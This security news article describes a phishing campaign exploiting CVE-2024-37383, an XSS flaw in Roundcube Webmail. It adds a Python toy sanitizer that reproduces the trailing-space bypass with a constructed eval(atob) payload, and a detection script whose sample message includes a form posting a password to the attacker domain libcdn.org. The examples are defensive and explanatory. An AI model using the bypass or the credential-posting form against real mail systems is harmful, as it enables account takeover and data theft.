These attackers used the flaw in a phishing campaign aimed at capturing the credentials of Roundcube users.  

Researchers from Positive Technologies have raised alarms about unknown threat actors trying to exploit a recently patched vulnerability, identified as CVE-2024-37383 (with a CVSS score of 6.1), in the open-source Roundcube webmail software.  

In September 2024, Positive Technologies identified an email sent to a government organization in a CIS country. Analysis of the timestamps revealed that the email had been dispatched in June 2024. Notably, the email had no visible content; it carried only an attachment that the email client did not display.  

The email body featured distinctive tags, including an eval(atob(…)) call, which the attackers used to base64-decode and execute JavaScript code. Researchers observed that the value of the attributeName attribute (attributeName="href ") carried a trailing space, which indicated that the email was an attempt to exploit the CVE-2024-37383 vulnerability in Roundcube Webmail.  

The vulnerability affects Roundcube Webmail versions earlier than 1.5.7 and 1.6.x prior to 1.6.7, enabling an attacker to carry out XSS attacks through SVG animate attributes. This issue was resolved in versions 1.5.7 and 1.6.7, released in May 2024.  

By exploiting this vulnerability, an attacker could execute arbitrary JavaScript code within the recipient’s web browser.  

To exploit the flaw, an attacker only needs to trick the recipient into opening a specially crafted email in a vulnerable version of the Roundcube client.  

“When an extra space is added to the ‘href’ attribute name, the syntax will not be filtered and will appear in the final document. Before this, it will be formatted as {attribute name} = {attribute value},” reads the report published by Positive Technologies. “By inserting JavaScript code as the value for ‘href’, we can execute it on the Roundcube page whenever a Roundcube client opens a malicious email.”  
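The following is an added example, not Roundcube's sanitizer code and not the Positive Technologies PoC: a toy allowlist sanitizer that reproduces the class of bug the report describes (an exact-string comparison of the `<animate attributeName="…">` value that a trailing space slips past), next to the hardened comparison that normalizes whitespace and case first. The sample SVG markup and the `alert(1)` payload are constructed for the example.

```python
"""Added example (not Roundcube code): exact-match vs normalized matching of
the <animate attributeName="..."> value, the pattern behind CVE-2024-37383."""
from html.parser import HTMLParser
import html

# Animation targets that let <animate> rewrite a link into a javascript: URL.
DANGEROUS_TARGETS = {"href", "xlink:href"}


class ToySanitizer(HTMLParser):
    """Re-serializes markup, dropping <animate> elements aimed at href.

    normalize=False keeps the bug: "href " (trailing space) is not equal to
    "href", so the element survives and lands in the rendered mail.
    normalize=True strips whitespace and folds case before comparing.
    """

    def __init__(self, normalize: bool):
        super().__init__()
        self.normalize = normalize
        self.out = []
        self.dropped = 0
        self._suppress_end = 0  # open <animate> tags we chose to drop

    def _is_blocked(self, tag, attrs):
        if tag != "animate":
            return False
        for name, value in attrs:
            # HTMLParser lower-cases attribute names and unescapes values,
            # but keeps the value's whitespace, which is the whole point.
            if name == "attributename" and value is not None:
                target = value.strip().lower() if self.normalize else value
                if target in DANGEROUS_TARGETS:
                    return True
        return False

    @staticmethod
    def _render(tag, attrs, self_closing=False):
        parts = [f' {n}="{html.escape(v, quote=True)}"' if v is not None else f" {n}"
                 for n, v in attrs]
        return f"<{tag}{''.join(parts)}{'/' if self_closing else ''}>"

    def handle_starttag(self, tag, attrs):
        if self._is_blocked(tag, attrs):
            self.dropped += 1
            self._suppress_end += 1
            return
        self.out.append(self._render(tag, attrs))

    def handle_startendtag(self, tag, attrs):
        if self._is_blocked(tag, attrs):
            self.dropped += 1
            return
        self.out.append(self._render(tag, attrs, self_closing=True))

    def handle_endtag(self, tag):
        if tag == "animate" and self._suppress_end:
            self._suppress_end -= 1
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(html.escape(data, quote=False))


def sanitize(markup: str, normalize: bool):
    """Return (sanitized markup, number of <animate> elements dropped)."""
    s = ToySanitizer(normalize)
    s.feed(markup)
    s.close()
    return "".join(s.out), s.dropped


# Constructed sample in the shape the article describes: an SVG link whose
# href is animated to a javascript: URL that base64-decodes and eval()s a
# payload. The payload here is only alert(1); note the trailing space in "href ".
MALICIOUS = (
    '<svg><a><animate attributeName="href " '
    "values=\"javascript:eval(atob('YWxlcnQoMSk='))\"/>"
    '<text x="10" y="20">open</text></a></svg>'
)
# Same payload with the canonical attribute name, which even the buggy check catches.
CANONICAL = MALICIOUS.replace('attributeName="href "', 'attributeName="href"')

if __name__ == "__main__":
    for label, sample in (("canonical", CANONICAL), ("trailing-space", MALICIOUS)):
        for normalize in (False, True):
            out, dropped = sanitize(sample, normalize)
            print(f"{label:15} normalize={normalize!s:5} dropped={dropped} -> {out}")
```

The buggy comparison removes the canonical `attributeName="href"` element but lets `attributeName="href "` through untouched; since the browser trims the value when it resolves the animation target, the surviving element still rewrites the link's href to the javascript: URL. Normalizing before the comparison (strip, lower-case) is the fix; an allowlist of attribute names, rather than a blocklist, is the more robust design.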

The researchers also released proof-of-concept (PoC) exploit code for this vulnerability.  

The JavaScript payload used in the attack saves an empty Word document named "Road map.docx" and retrieves messages from the mail server through the ManageSieve plugin.  

This attack generates a fake login form within the Roundcube interface, allowing it to capture user credentials and transmit them to a malicious server (libcdn.org) registered in 2024.  
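As an added example (not code from the article, the PoC, or Roundcube), the following Python script walks a raw RFC 822 message, decodes every text/html part including base64-encoded attachments, and flags the indicators the report describes: a padded `attributeName` value, an `eval(atob(` call, a javascript: URL inside an `<animate>` element, and a reference to the libcdn.org domain. The two sample messages, their sender and recipient addresses, and the indicator names are constructed for the example.

```python
"""Added example: hunting for the CVE-2024-37383 phishing indicators in raw
mail. Sample messages below are constructed, not captured traffic."""
import base64
import re
from email import message_from_bytes
from email.message import Message

# <animate attributeName="..."> whose value is href only after stripping.
ATTRIBUTE_NAME = re.compile(r'attributeName\s*=\s*(?P<q>["\'])(?P<v>[^"\']*)(?P=q)', re.I)
EVAL_ATOB = re.compile(r"eval\s*\(\s*atob\s*\(", re.I)
JS_URL_IN_ANIMATE = re.compile(r"<animate\b[^>]*\bjavascript:", re.I | re.S)
EXFIL_HOST = re.compile(r"\blibcdn\.org\b", re.I)  # domain named in the report


def html_parts(msg: Message):
    """Yield the decoded text of every text/html part, attachments included."""
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            raw = part.get_payload(decode=True) or b""
            charset = part.get_content_charset() or "utf-8"
            yield raw.decode(charset, errors="replace")


def indicators(raw_message: bytes) -> set:
    """Return the set of indicator names found in any HTML part of the message."""
    hits = set()
    msg = message_from_bytes(raw_message)
    for body in html_parts(msg):
        for m in ATTRIBUTE_NAME.finditer(body):
            v = m.group("v")
            # The CVE-2024-37383 trick: whitespace padding an exact match misses.
            if v.strip().lower() in ("href", "xlink:href") and v != v.strip():
                hits.add("padded-attributeName")
        if EVAL_ATOB.search(body):
            hits.add("eval-atob")
        if JS_URL_IN_ANIMATE.search(body):
            hits.add("javascript-url-in-animate")
        if EXFIL_HOST.search(body):
            hits.add("known-exfil-domain")
    return hits


def build_message(html_body: str, subject: str) -> bytes:
    """Constructed sample: an empty text part plus a base64-encoded HTML part,
    so the payload is invisible in the raw transport until decoded."""
    boundary = "==sample-boundary=="
    encoded = base64.b64encode(html_body.encode("utf-8")).decode("ascii")
    return (
        "From: sender@example.invalid\r\nTo: victim@example.invalid\r\n"
        f"Subject: {subject}\r\nMIME-Version: 1.0\r\n"
        f'Content-Type: multipart/mixed; boundary="{boundary}"\r\n\r\n'
        f"--{boundary}\r\nContent-Type: text/plain; charset=utf-8\r\n\r\n\r\n"
        f"--{boundary}\r\nContent-Type: text/html; charset=utf-8\r\n"
        f"Content-Transfer-Encoding: base64\r\n\r\n{encoded}\r\n"
        f"--{boundary}--\r\n"
    ).encode("utf-8")


# Constructed sample shaped like the attack the article describes: padded
# attributeName, eval(atob(...)) payload, and a form posting to libcdn.org.
SUSPICIOUS = build_message(
    '<svg><a><animate attributeName="href " '
    "values=\"javascript:eval(atob('YWxlcnQoMSk='))\"/></a></svg>"
    '<form action="https://libcdn.org/login"><input name="pass"></form>',
    "",
)
BENIGN = build_message("<p>Quarterly figures attached.</p>", "Q3 report")

if __name__ == "__main__":
    for name, sample in (("suspicious", SUSPICIOUS), ("benign", BENIGN)):
        print(f"{name}: {sorted(indicators(sample)) or 'clean'}")
```

Run it over a mail spool or an exported .eml set and treat `padded-attributeName` on its own as a high-confidence signal: there is no legitimate reason for whitespace inside that value. The other three indicators are weaker individually but combine well, and the domain check should be extended with whatever exfiltration hosts later reporting adds.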

“Vulnerabilities in Roundcube Webmail have been a frequent target for cybercriminals. The latest such attack was a campaign linked to the Winter Vivern group, which exploited the XSS vulnerability in Roundcube to target government organizations in several European countries. However, based on the available information, the attack described in this article cannot be linked to known actors,” concludes the report.  

“While Roundcube Webmail may not be the most widely used email client, it remains a target for hackers due to its prevalent use by government agencies. Attacks on this software can result in significant damage, allowing cybercriminals to steal sensitive information.” 
